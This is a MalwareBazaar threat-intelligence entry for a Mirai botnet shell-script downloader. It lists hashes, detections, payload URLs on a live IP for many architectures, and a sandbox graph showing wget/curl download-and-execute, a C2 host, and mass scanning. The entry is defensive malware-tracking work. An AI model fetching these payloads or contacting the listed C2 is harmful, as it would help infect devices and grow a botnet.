MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: bc5e4f1197ea957d1958b59f2709e91026418a5b340e300e55a062144aa87557
SHA3-384 hash: adce71720b218fc8fc49a355422d684acddbc61505e1be08ee112909087f3ab684b8887cc77332f34daa02a0d4c906a6
SHA1 hash: 125bc711aa827bb2f80f50ff4e09b3ed4d1f5320
MD5 hash: 6f7b8821e099f96dc33c2ee1172372b7
humanhash: cold-romeo-potato-fifteen
File name:76d32be0.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:4'737 bytes
First seen:2026-03-28 03:17:45 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 48:vpK8KMV4kCpKDK1V4OpKrOKrWV4ZpKQKoV4HpKE0KEEV4EbpKUKkV47pKDK1V4OQ:v3IdDbcXATGEpb7aFHjRfsjCtBr9jq/z
TLSH T143A1D2E974B4936A2DA1ED7371D6C942F14060A7E4C91D0AE6D2F0E4488DF61F484B82
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86c2255234f1a3d8b59014fd1b5bf43119aa164349f135d7c4a5595301e62d930e Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mipsc88e8314b162dd34a64a8486b16f532d1c49cd472b3445c9e5c9c78f2bbaf2f4 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpslf512aa138d45a334b5158b527ddeb2009d8192b007840a172f035b2f9c41a55f Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm962b3b3843cf7519d82f748d09ddbc63817ddc23418211281913fb25b54b391a Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5269a363ff2eb073049f31948d48086c4fd115d7942535a0f82d3ba6eb0baa4b2 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm67fec9a423202af508020fc2d69e5ee58ffe608f3950495b92bc1eea7a7e68e0c Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm70ba78d70d0dd96d14a2a0baaeecec89b5a6c1e3ac5bc6c5996b55efe3e37eb35 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc11c68617eaeaa09ac2f7842667db1dfd2e39d061a2e48352f26102b7dfb9c85a Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68kc990fae684b215cdedd79223ac1e0da674ae011cbd63caa8e7b0f67db871ebb1 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc55db943ff242b32de9dc9fa31473a4b849ca92dcee182a2d8265053f4bd67c74 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i68694da95cad09a71040570af0d28e8f7a02f759e2201133f83550dce6aacec3a3c Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh47d235334a669faa5d2b6e1c1b1bd59f38af7bc555a69e17c732617ed101ff055 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arcbaa57a1cc7595718da139ceba6afa34f4dbbcda23757c6139a9c15abfe024975 Miraielf mirai ua-wget
http://176.65.139.80/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x6443b395eaf6d796cec36c1c3999939022a705f91597c403ecf31b1adb0ec80cf7 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
49
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

Result
Gathering data
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/cb86c324-3c02-4959-9b3b-e350d7d77a51
Behavior Graph:
Download SVG
%3 guuid=f533ef43-1800-0000-8c02-080b9d0c0000 pid=3229 /usr/bin/sudo guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230 /tmp/sample.bin guuid=f533ef43-1800-0000-8c02-080b9d0c0000 pid=3229->guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230 execve guuid=4ee4a647-1800-0000-8c02-080ba00c0000 pid=3232 /usr/bin/wget net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=4ee4a647-1800-0000-8c02-080ba00c0000 pid=3232 execve guuid=b39dfd4d-1800-0000-8c02-080baa0c0000 pid=3242 /usr/bin/curl net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=b39dfd4d-1800-0000-8c02-080baa0c0000 pid=3242 execve guuid=39902a57-1800-0000-8c02-080bb60c0000 pid=3254 /usr/bin/cat guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=39902a57-1800-0000-8c02-080bb60c0000 pid=3254 execve guuid=5a137c58-1800-0000-8c02-080bb70c0000 pid=3255 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=5a137c58-1800-0000-8c02-080bb70c0000 pid=3255 execve guuid=cb255859-1800-0000-8c02-080bb90c0000 pid=3257 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=cb255859-1800-0000-8c02-080bb90c0000 pid=3257 execve guuid=8453d759-1800-0000-8c02-080bbb0c0000 pid=3259 /usr/bin/wget net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=8453d759-1800-0000-8c02-080bbb0c0000 pid=3259 execve guuid=a8a99764-1800-0000-8c02-080bd30c0000 pid=3283 /usr/bin/curl net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=a8a99764-1800-0000-8c02-080bd30c0000 pid=3283 execve guuid=c8c95a6b-1800-0000-8c02-080be80c0000 pid=3304 /usr/bin/bash guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=c8c95a6b-1800-0000-8c02-080be80c0000 pid=3304 clone guuid=e4b3786b-1800-0000-8c02-080bea0c0000 pid=3306 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=e4b3786b-1800-0000-8c02-080bea0c0000 pid=3306 execve guuid=cb3ab36b-1800-0000-8c02-080beb0c0000 pid=3307 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=cb3ab36b-1800-0000-8c02-080beb0c0000 pid=3307 execve guuid=57de409c-1900-0000-8c02-080bf80e0000 pid=3832 /usr/bin/wget net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=57de409c-1900-0000-8c02-080bf80e0000 pid=3832 execve guuid=ff3d03a9-1900-0000-8c02-080b220f0000 pid=3874 /usr/bin/curl net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=ff3d03a9-1900-0000-8c02-080b220f0000 pid=3874 execve guuid=8ba803af-1900-0000-8c02-080b370f0000 pid=3895 /usr/bin/bash guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=8ba803af-1900-0000-8c02-080b370f0000 pid=3895 clone guuid=fd2a23af-1900-0000-8c02-080b380f0000 pid=3896 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=fd2a23af-1900-0000-8c02-080b380f0000 pid=3896 execve guuid=e74878af-1900-0000-8c02-080b3a0f0000 pid=3898 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=e74878af-1900-0000-8c02-080b3a0f0000 pid=3898 execve guuid=470fafe4-1a00-0000-8c02-080bcb120000 pid=4811 /usr/bin/wget net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=470fafe4-1a00-0000-8c02-080bcb120000 pid=4811 execve guuid=a978b6e7-1a00-0000-8c02-080bd5120000 pid=4821 /usr/bin/curl net send-data write-file guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=a978b6e7-1a00-0000-8c02-080bd5120000 pid=4821 execve guuid=704b17ef-1a00-0000-8c02-080bf0120000 pid=4848 /usr/bin/bash guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=704b17ef-1a00-0000-8c02-080bf0120000 pid=4848 clone guuid=c29e30ef-1a00-0000-8c02-080bf1120000 pid=4849 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=c29e30ef-1a00-0000-8c02-080bf1120000 pid=4849 execve guuid=c06c82ef-1a00-0000-8c02-080bf3120000 pid=4851 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=c06c82ef-1a00-0000-8c02-080bf3120000 pid=4851 execve guuid=12e79323-1c00-0000-8c02-080b8a140000 pid=5258 /usr/bin/wget net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=12e79323-1c00-0000-8c02-080b8a140000 pid=5258 execve guuid=f53ebc26-1c00-0000-8c02-080b8f140000 pid=5263 /usr/bin/curl net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=f53ebc26-1c00-0000-8c02-080b8f140000 pid=5263 execve guuid=a0faa02c-1c00-0000-8c02-080b90140000 pid=5264 /usr/bin/bash guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=a0faa02c-1c00-0000-8c02-080b90140000 pid=5264 clone guuid=0e3cbe2c-1c00-0000-8c02-080b91140000 pid=5265 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=0e3cbe2c-1c00-0000-8c02-080b91140000 pid=5265 execve guuid=b16a072d-1c00-0000-8c02-080b92140000 pid=5266 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=b16a072d-1c00-0000-8c02-080b92140000 pid=5266 execve guuid=8c5efad7-2100-0000-8c02-080bd5140000 pid=5333 /usr/bin/wget net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=8c5efad7-2100-0000-8c02-080bd5140000 pid=5333 execve guuid=86684cdd-2100-0000-8c02-080bda140000 pid=5338 /usr/bin/curl net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=86684cdd-2100-0000-8c02-080bda140000 pid=5338 execve guuid=1ed16ee0-2100-0000-8c02-080bdb140000 pid=5339 /usr/bin/bash guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=1ed16ee0-2100-0000-8c02-080bdb140000 pid=5339 clone guuid=fd748fe0-2100-0000-8c02-080bdc140000 pid=5340 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=fd748fe0-2100-0000-8c02-080bdc140000 pid=5340 execve guuid=0adfd7e0-2100-0000-8c02-080bdd140000 pid=5341 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=0adfd7e0-2100-0000-8c02-080bdd140000 pid=5341 execve guuid=cf52588d-2700-0000-8c02-080bdf140000 pid=5343 /usr/bin/wget net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=cf52588d-2700-0000-8c02-080bdf140000 pid=5343 execve guuid=e04ed08f-2700-0000-8c02-080be4140000 pid=5348 /usr/bin/curl net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=e04ed08f-2700-0000-8c02-080be4140000 pid=5348 execve guuid=93e7e491-2700-0000-8c02-080be5140000 pid=5349 /usr/bin/bash guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=93e7e491-2700-0000-8c02-080be5140000 pid=5349 clone guuid=49dafd91-2700-0000-8c02-080be6140000 pid=5350 /usr/bin/chmod guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=49dafd91-2700-0000-8c02-080be6140000 pid=5350 execve guuid=2fcb3c92-2700-0000-8c02-080be7140000 pid=5351 /tmp/76d32be0 net guuid=00715246-1800-0000-8c02-080b9e0c0000 pid=3230->guuid=2fcb3c92-2700-0000-8c02-080be7140000 pid=5351 execve 36b1b8f9-982a-5d21-ae66-55c270ae0d99 176.65.139.80:80 guuid=4ee4a647-1800-0000-8c02-080ba00c0000 pid=3232->36b1b8f9-982a-5d21-ae66-55c270ae0d99 send: 197B guuid=b39dfd4d-1800-0000-8c02-080baa0c0000 pid=3242->36b1b8f9-982a-5d21-ae66-55c270ae0d99 send: 146B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=cb255859-1800-0000-8c02-080bb90c0000 pid=3257->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258 /tmp/76d32be0 dns net send-data zombie guuid=cb255859-1800-0000-8c02-080bb90c0000 pid=3257->guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258 clone guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 28B 2ac2249c-25bc-5019-a88f-33a6c2731b07 cnc.504.su:56999 guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258->2ac2249c-25bc-5019-a88f-33a6c2731b07 send: 12B guuid=6395e159-1800-0000-8c02-080bbc0c0000 pid=3260 /tmp/76d32be0 guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258->guuid=6395e159-1800-0000-8c02-080bbc0c0000 pid=3260 clone guuid=a6e4e459-1800-0000-8c02-080bbd0c0000 pid=3261 /tmp/76d32be0 net net-scan send-data guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258->guuid=a6e4e459-1800-0000-8c02-080bbd0c0000 pid=3261 clone guuid=4635ea59-1800-0000-8c02-080bbe0c0000 pid=3262 /tmp/76d32be0 net net-scan send-data guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258->guuid=4635ea59-1800-0000-8c02-080bbe0c0000 pid=3262 clone guuid=11c5f059-1800-0000-8c02-080bbf0c0000 pid=3263 /tmp/76d32be0 guuid=4bd6ae59-1800-0000-8c02-080bba0c0000 pid=3258->guuid=11c5f059-1800-0000-8c02-080bbf0c0000 pid=3263 clone 4bcd05e0-7ebf-53bb-9cc8-c008d3256770 cnc.504.su:80 guuid=8453d759-1800-0000-8c02-080bbb0c0000 pid=3259->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 198B guuid=a6e4e459-1800-0000-8c02-080bbd0c0000 pid=3261->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=a6e4e459-1800-0000-8c02-080bbd0c0000 pid=3261|send-data send-data to 384 IP addresses review logs to see them all guuid=a6e4e459-1800-0000-8c02-080bbd0c0000 pid=3261->guuid=a6e4e459-1800-0000-8c02-080bbd0c0000 pid=3261|send-data send guuid=4635ea59-1800-0000-8c02-080bbe0c0000 pid=3262->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=4635ea59-1800-0000-8c02-080bbe0c0000 pid=3262|send-data send-data to 320 IP addresses review logs to see them all guuid=4635ea59-1800-0000-8c02-080bbe0c0000 pid=3262->guuid=4635ea59-1800-0000-8c02-080bbe0c0000 pid=3262|send-data send guuid=a8a99764-1800-0000-8c02-080bd30c0000 pid=3283->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 147B guuid=cb3ab36b-1800-0000-8c02-080beb0c0000 pid=3307->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 5fbefa0b-74db-5ddb-909f-7c8f89ca1384 0.0.0.0:46157 guuid=cb3ab36b-1800-0000-8c02-080beb0c0000 pid=3307->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830 /tmp/76d32be0 dns net send-data zombie guuid=cb3ab36b-1800-0000-8c02-080beb0c0000 pid=3307->guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830 clone guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 28B guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830->2ac2249c-25bc-5019-a88f-33a6c2731b07 send: 12B guuid=a13c439c-1900-0000-8c02-080bf90e0000 pid=3833 /tmp/76d32be0 guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830->guuid=a13c439c-1900-0000-8c02-080bf90e0000 pid=3833 clone guuid=c444539c-1900-0000-8c02-080bfa0e0000 pid=3834 /tmp/76d32be0 net net-scan send-data guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830->guuid=c444539c-1900-0000-8c02-080bfa0e0000 pid=3834 clone guuid=adc1589c-1900-0000-8c02-080bfb0e0000 pid=3835 /tmp/76d32be0 net net-scan send-data guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830->guuid=adc1589c-1900-0000-8c02-080bfb0e0000 pid=3835 clone guuid=18895c9c-1900-0000-8c02-080bfc0e0000 pid=3836 /tmp/76d32be0 guuid=48e3359c-1900-0000-8c02-080bf60e0000 pid=3830->guuid=18895c9c-1900-0000-8c02-080bfc0e0000 pid=3836 clone guuid=57de409c-1900-0000-8c02-080bf80e0000 pid=3832->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 198B guuid=c444539c-1900-0000-8c02-080bfa0e0000 pid=3834->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=c444539c-1900-0000-8c02-080bfa0e0000 pid=3834|send-data send-data to 384 IP addresses review logs to see them all guuid=c444539c-1900-0000-8c02-080bfa0e0000 pid=3834->guuid=c444539c-1900-0000-8c02-080bfa0e0000 pid=3834|send-data send guuid=adc1589c-1900-0000-8c02-080bfb0e0000 pid=3835->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=adc1589c-1900-0000-8c02-080bfb0e0000 pid=3835|send-data send-data to 320 IP addresses review logs to see them all guuid=adc1589c-1900-0000-8c02-080bfb0e0000 pid=3835->guuid=adc1589c-1900-0000-8c02-080bfb0e0000 pid=3835|send-data send guuid=ff3d03a9-1900-0000-8c02-080b220f0000 pid=3874->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 147B guuid=e74878af-1900-0000-8c02-080b3a0f0000 pid=3898->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=e74878af-1900-0000-8c02-080b3a0f0000 pid=3898->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810 /tmp/76d32be0 dns net send-data zombie guuid=e74878af-1900-0000-8c02-080b3a0f0000 pid=3898->guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810 clone guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 28B guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810->2ac2249c-25bc-5019-a88f-33a6c2731b07 send: 12B guuid=32deb5e4-1a00-0000-8c02-080bcc120000 pid=4812 /tmp/76d32be0 guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810->guuid=32deb5e4-1a00-0000-8c02-080bcc120000 pid=4812 clone guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813 /tmp/76d32be0 net net-scan send-data guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810->guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813 clone guuid=00bec2e4-1a00-0000-8c02-080bce120000 pid=4814 /tmp/76d32be0 net net-scan send-data guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810->guuid=00bec2e4-1a00-0000-8c02-080bce120000 pid=4814 clone guuid=577dcae4-1a00-0000-8c02-080bcf120000 pid=4815 /tmp/76d32be0 guuid=e119a2e4-1a00-0000-8c02-080bca120000 pid=4810->guuid=577dcae4-1a00-0000-8c02-080bcf120000 pid=4815 clone guuid=470fafe4-1a00-0000-8c02-080bcb120000 pid=4811->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 5935590f-a6aa-5aa1-beb0-284112bfa14e 194.39.112.213:23 guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813->5935590f-a6aa-5aa1-beb0-284112bfa14e send: 40B guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813|send-data send-data to 768 IP addresses review logs to see them all guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813->guuid=fa8dbde4-1a00-0000-8c02-080bcd120000 pid=4813|send-data send guuid=00bec2e4-1a00-0000-8c02-080bce120000 pid=4814->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=00bec2e4-1a00-0000-8c02-080bce120000 pid=4814|send-data send-data to 320 IP addresses review logs to see them all guuid=00bec2e4-1a00-0000-8c02-080bce120000 pid=4814->guuid=00bec2e4-1a00-0000-8c02-080bce120000 pid=4814|send-data send guuid=a978b6e7-1a00-0000-8c02-080bd5120000 pid=4821->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 send: 146B guuid=c06c82ef-1a00-0000-8c02-080bf3120000 pid=4851->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=c06c82ef-1a00-0000-8c02-080bf3120000 pid=4851->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257 /tmp/76d32be0 dns net send-data zombie guuid=c06c82ef-1a00-0000-8c02-080bf3120000 pid=4851->guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257 clone guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 28B guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257->2ac2249c-25bc-5019-a88f-33a6c2731b07 con guuid=98699b23-1c00-0000-8c02-080b8b140000 pid=5259 /tmp/76d32be0 guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257->guuid=98699b23-1c00-0000-8c02-080b8b140000 pid=5259 clone guuid=79a8a823-1c00-0000-8c02-080b8c140000 pid=5260 /tmp/76d32be0 net net-scan send-data zombie guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257->guuid=79a8a823-1c00-0000-8c02-080b8c140000 pid=5260 clone guuid=606faf23-1c00-0000-8c02-080b8d140000 pid=5261 /tmp/76d32be0 net net-scan send-data zombie guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257->guuid=606faf23-1c00-0000-8c02-080b8d140000 pid=5261 clone guuid=812bb723-1c00-0000-8c02-080b8e140000 pid=5262 /tmp/76d32be0 guuid=6dcb8423-1c00-0000-8c02-080b89140000 pid=5257->guuid=812bb723-1c00-0000-8c02-080b8e140000 pid=5262 clone guuid=12e79323-1c00-0000-8c02-080b8a140000 pid=5258->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=79a8a823-1c00-0000-8c02-080b8c140000 pid=5260->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=79a8a823-1c00-0000-8c02-080b8c140000 pid=5260|send-data send-data to 4097 IP addresses review logs to see them all guuid=79a8a823-1c00-0000-8c02-080b8c140000 pid=5260->guuid=79a8a823-1c00-0000-8c02-080b8c140000 pid=5260|send-data send guuid=606faf23-1c00-0000-8c02-080b8d140000 pid=5261->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=606faf23-1c00-0000-8c02-080b8d140000 pid=5261|send-data send-data to 4097 IP addresses review logs to see them all guuid=606faf23-1c00-0000-8c02-080b8d140000 pid=5261->guuid=606faf23-1c00-0000-8c02-080b8d140000 pid=5261|send-data send guuid=f53ebc26-1c00-0000-8c02-080b8f140000 pid=5263->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=b16a072d-1c00-0000-8c02-080b92140000 pid=5266->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=b16a072d-1c00-0000-8c02-080b92140000 pid=5266->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332 /tmp/76d32be0 net send-data zombie guuid=b16a072d-1c00-0000-8c02-080b92140000 pid=5266->guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332 clone guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=aff100d8-2100-0000-8c02-080bd6140000 pid=5334 /tmp/76d32be0 guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332->guuid=aff100d8-2100-0000-8c02-080bd6140000 pid=5334 clone guuid=b51e08d8-2100-0000-8c02-080bd7140000 pid=5335 /tmp/76d32be0 net net-scan send-data zombie guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332->guuid=b51e08d8-2100-0000-8c02-080bd7140000 pid=5335 clone guuid=943b0ed8-2100-0000-8c02-080bd8140000 pid=5336 /tmp/76d32be0 net net-scan send-data zombie guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332->guuid=943b0ed8-2100-0000-8c02-080bd8140000 pid=5336 clone guuid=764814d8-2100-0000-8c02-080bd9140000 pid=5337 /tmp/76d32be0 guuid=04ededd7-2100-0000-8c02-080bd4140000 pid=5332->guuid=764814d8-2100-0000-8c02-080bd9140000 pid=5337 clone guuid=8c5efad7-2100-0000-8c02-080bd5140000 pid=5333->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=b51e08d8-2100-0000-8c02-080bd7140000 pid=5335->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=b51e08d8-2100-0000-8c02-080bd7140000 pid=5335|send-data send-data to 4097 IP addresses review logs to see them all guuid=b51e08d8-2100-0000-8c02-080bd7140000 pid=5335->guuid=b51e08d8-2100-0000-8c02-080bd7140000 pid=5335|send-data send guuid=943b0ed8-2100-0000-8c02-080bd8140000 pid=5336->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=943b0ed8-2100-0000-8c02-080bd8140000 pid=5336|send-data send-data to 4097 IP addresses review logs to see them all guuid=943b0ed8-2100-0000-8c02-080bd8140000 pid=5336->guuid=943b0ed8-2100-0000-8c02-080bd8140000 pid=5336|send-data send guuid=86684cdd-2100-0000-8c02-080bda140000 pid=5338->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=0adfd7e0-2100-0000-8c02-080bdd140000 pid=5341->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=0adfd7e0-2100-0000-8c02-080bdd140000 pid=5341->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342 /tmp/76d32be0 net send-data zombie guuid=0adfd7e0-2100-0000-8c02-080bdd140000 pid=5341->guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342 clone guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 56B guuid=f3d7588d-2700-0000-8c02-080be0140000 pid=5344 /tmp/76d32be0 guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342->guuid=f3d7588d-2700-0000-8c02-080be0140000 pid=5344 clone guuid=1d765d8d-2700-0000-8c02-080be1140000 pid=5345 /tmp/76d32be0 net net-scan send-data zombie guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342->guuid=1d765d8d-2700-0000-8c02-080be1140000 pid=5345 clone guuid=b823628d-2700-0000-8c02-080be2140000 pid=5346 /tmp/76d32be0 net net-scan send-data zombie guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342->guuid=b823628d-2700-0000-8c02-080be2140000 pid=5346 clone guuid=46af688d-2700-0000-8c02-080be3140000 pid=5347 /tmp/76d32be0 guuid=11464a8d-2700-0000-8c02-080bde140000 pid=5342->guuid=46af688d-2700-0000-8c02-080be3140000 pid=5347 clone guuid=cf52588d-2700-0000-8c02-080bdf140000 pid=5343->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=1d765d8d-2700-0000-8c02-080be1140000 pid=5345->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=1d765d8d-2700-0000-8c02-080be1140000 pid=5345|send-data send-data to 4097 IP addresses review logs to see them all 